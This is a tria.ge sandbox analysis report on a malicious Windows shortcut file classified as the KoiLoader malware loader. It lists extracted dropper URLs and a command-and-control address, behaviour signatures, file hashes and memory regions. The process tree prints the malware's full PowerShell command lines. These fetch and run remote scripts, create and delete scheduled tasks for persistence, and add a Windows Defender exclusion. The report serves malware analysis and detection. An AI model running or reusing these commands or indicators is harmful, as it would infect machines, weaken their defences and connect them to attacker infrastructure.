Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

215ff81b6f...26.lnk

windows7-x64

10

215ff81b6f...26.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    132s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326.lnk

  • Size

    3KB

  • MD5

    34ee898cb6c5ae305685129bd0b02ceb

  • SHA1

    72c04950fa82ea474c945f31dc3e7a32635689ae

  • SHA256

    215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326

  • SHA512

    7bf440741559ffffda909092e32329635eed5a5afd31316f58a4080f8855c57d9399f4b25d6535a490e5c28727586209e3ff7c44c4d2e947c837ab58272b976d

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Family

koiloader

C2

http://195.123.217.43/oversate.php

Attributes
  • payload_url

    https://www.italialife24.it/wp-content/uploads/2021/05

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 2 IoCs
    loader
  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\215ff81b6f3a50e48d9f5acfb89f5ea3a1afd59dddbb0666f7ce97a922f60326.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $NcO7enPofW2RuhM1 = New-Object Net.WebClient; $cio = $NcO7enPofW2RuhM1.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $NcO7enPofW2RuhM1.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', '7Jb5KYoTpe8IWE.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('7Jb5KYoTpe8IWE.js ' * 2)) /tn 48dYPKZW1;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4628
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js " /tn 48dYPKZW1
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:640
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\QNF3UF0Y2TSX.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\QNF3UF0Y2TSX.js "
      2⤵
      • Blocklisted process makes network request
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4284
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
        3⤵
          PID:4988
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\QNF3UF0Y2TSX.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2396
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zOVLTY6FH7P'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4568
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4916
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2008
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:860
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4164
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1008
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js 7Jb5KYoTpe8IWE.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2564
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\QNF3UF0Y2TSX.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn 7Jb5KYoTpe8IWE.js /f; wscript $env:programdata\QNF3UF0Y2TSX.js "
        2⤵
        • Blocklisted process makes network request
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:464
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn 7Jb5KYoTpe8IWE.js /f
          3⤵
            PID:736
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\QNF3UF0Y2TSX.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4524
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zUIGHJO0WWJ'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2500
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\rcca0d105-8260-4611-8c12-bd85a7208b9fr.js"
        1⤵
          PID:3044

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\QNF3UF0Y2TSX.js
          Filesize

          1KB

          MD5

          cd252dde6e37ebd4ccc45b61bc266cdc

          SHA1

          2b478c5b727a7a529592508f188c967b73e0a68b

          SHA256

          27cd655a92aedd3243f7eec0b72395314dce7b0aef729f566905351025782886

          SHA512

          ef1b11ec5328aa7f8030d9a6ac8742f0440f4bf9ddfa8de1af0875d4eb2f932e9159157cc25fb540d0b925c37092eb474a53c5a04328d9fe5e81e37e803f2366

          Download Submit

        • C:\ProgramData\QNF3UF0Y2TSX.js
          Filesize

          1KB

          MD5

          b9ac17ba81e63ab4289dd78472a80260

          SHA1

          a2d14cb948696c8e4c70d120deeb4256fd297d2c

          SHA256

          500448d8a5419525004f68a7e40d9d7c0bc2c2470a873e5fa72662d9ab10862f

          SHA512

          d83aa697a7b742a52ea1c4bf3d81f0c6f452303d547f56b80fb4114543edc1ea61e4b117f4fbf544d57a67f2d7074695f062414d384dc867d1e3d459a8b36230

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          19KB

          MD5

          5cf37040cc74f3f36439ce7c827daf14

          SHA1

          5c26756962c14893f75eeaf12d34bb479d29420d

          SHA256

          94a65cad1c5bfba06f1b0176f5e4fb8185637cd68d7bfc26985f044ce465ec52

          SHA512

          7d1cec6a8aa4936359897b228d0590a42a92af3461a86218024e56ab243529ac7f6a56a019e31ab20bfac0f8137a40020e64b1a0cb89be2276809d2cd25ef5e4

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          477031a32089e6d066092d640b526add

          SHA1

          5041602c7c71b4c6e40928039dcc07b6b32a67f2

          SHA256

          0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

          SHA512

          01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          1d0098ede77173f17ca62cb6b06d9fa3

          SHA1

          32c2b14c1102f66b76c2336c40578ab10644f20e

          SHA256

          550fab4217e9ef5fd50ceb22f76ce9baeed369cf04f4c1586edb8b3704457c64

          SHA512

          e39efba79caf121a53b294a8655458569aae3fa700820ccc0cead955adfa6cd895d39b7b2c9e581ee9c58c10aa4b15d9002ad102a3cff7a3f0974d66a7b345b6

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          0f6a3762a04bbb03336fb66a040afb97

          SHA1

          0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

          SHA256

          36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

          SHA512

          cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\7Jb5KYoTpe8IWE.js
          Filesize

          304B

          MD5

          5673ac899219e0aa96db455f6e4f260c

          SHA1

          3d72aaf0319aa5daba340be5dfa3eeb9439669ec

          SHA256

          38e2effb74721d04383f23716957ecbdb5944bdb1097e0dbf668a90d1a77aeff

          SHA512

          0e724407bff54d1b64a9792a507947bc1118808ba5f384721a68180b3dae81bf2942d5d281b3920e67700aab99bf990ffc7e042b4112b33a375e5ab4dc447c0a

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qbanbpvf.mqf.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/1008-94-0x0000000007A30000-0x0000000007A3E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1008-69-0x0000000006AE0000-0x0000000006B12000-memory.dmp

          Filesize

          200KB

          Download

        • memory/1008-82-0x0000000007870000-0x000000000787A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/1008-81-0x0000000007700000-0x00000000077A3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/1008-80-0x0000000006AA0000-0x0000000006ABE000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1008-70-0x0000000071230000-0x000000007127C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1008-93-0x0000000007A00000-0x0000000007A11000-memory.dmp

          Filesize

          68KB

          Download

        • memory/1008-97-0x0000000007B20000-0x0000000007B28000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1008-96-0x0000000007B40000-0x0000000007B5A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1008-95-0x0000000007A40000-0x0000000007A54000-memory.dmp

          Filesize

          80KB

          Download

        • memory/1008-92-0x0000000007A80000-0x0000000007B16000-memory.dmp

          Filesize

          600KB

          Download

        • memory/2008-100-0x00000000078A0000-0x00000000078C2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2008-104-0x0000000008220000-0x00000000082B2000-memory.dmp

          Filesize

          584KB

          Download

        • memory/2008-101-0x00000000085E0000-0x0000000008B84000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2008-102-0x0000000008080000-0x000000000809A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2008-103-0x0000000008130000-0x0000000008180000-memory.dmp

          Filesize

          320KB

          Download

        • memory/2500-134-0x0000000007D90000-0x0000000007D9D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4568-36-0x0000000005340000-0x0000000005968000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/4568-38-0x0000000005250000-0x00000000052B6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4568-55-0x0000000007860000-0x0000000007861000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4568-54-0x0000000007A50000-0x00000000080CA000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/4568-53-0x00000000064D0000-0x00000000064EA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/4568-52-0x00000000061A0000-0x00000000061EC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/4568-51-0x0000000006170000-0x000000000618E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/4568-49-0x0000000005BB0000-0x0000000005F04000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/4568-39-0x00000000052C0000-0x0000000005326000-memory.dmp

          Filesize

          408KB

          Download

        • memory/4568-56-0x0000000007900000-0x000000000790D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/4568-37-0x00000000051B0000-0x00000000051D2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/4568-35-0x0000000002B90000-0x0000000002BC6000-memory.dmp

          Filesize

          216KB

          Download

        • memory/4628-2-0x00007FFFAEA13000-0x00007FFFAEA15000-memory.dmp

          Filesize

          8KB

          Download

        • memory/4628-18-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4628-14-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4628-13-0x00007FFFAEA10000-0x00007FFFAF4D1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/4628-8-0x000002B3C83F0000-0x000002B3C8412000-memory.dmp

          Filesize

          136KB

          Download